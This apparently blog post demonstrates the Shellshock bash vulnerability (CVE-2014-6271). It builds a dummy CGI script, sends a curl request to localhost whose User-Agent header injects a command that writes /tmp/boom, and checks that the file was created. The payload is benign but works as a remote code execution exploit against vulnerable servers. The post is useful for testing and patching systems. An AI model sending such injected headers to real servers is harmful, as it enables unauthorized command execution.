CVE-2014-6271 (ShellShock) remote code execution PoC

create a file for cgi execution

fill with sample innocent code
echo "Content-type: text/html"
echo ""
echo "dummy output"

execute it
curl -H 'User-Agent: () { :;}; echo boom>/tmp/boom'  http://localhost/cgi-bin/
dummy output

and see if the file is created
ls -l /tmp/boom
-rw-r--r--. 1 apache apache 5 Sep 25 21:20 /tmp/boom

One thought on “CVE-2014-6271 (ShellShock) remote code execution PoC”

Leave a Reply

Your email address will not be published.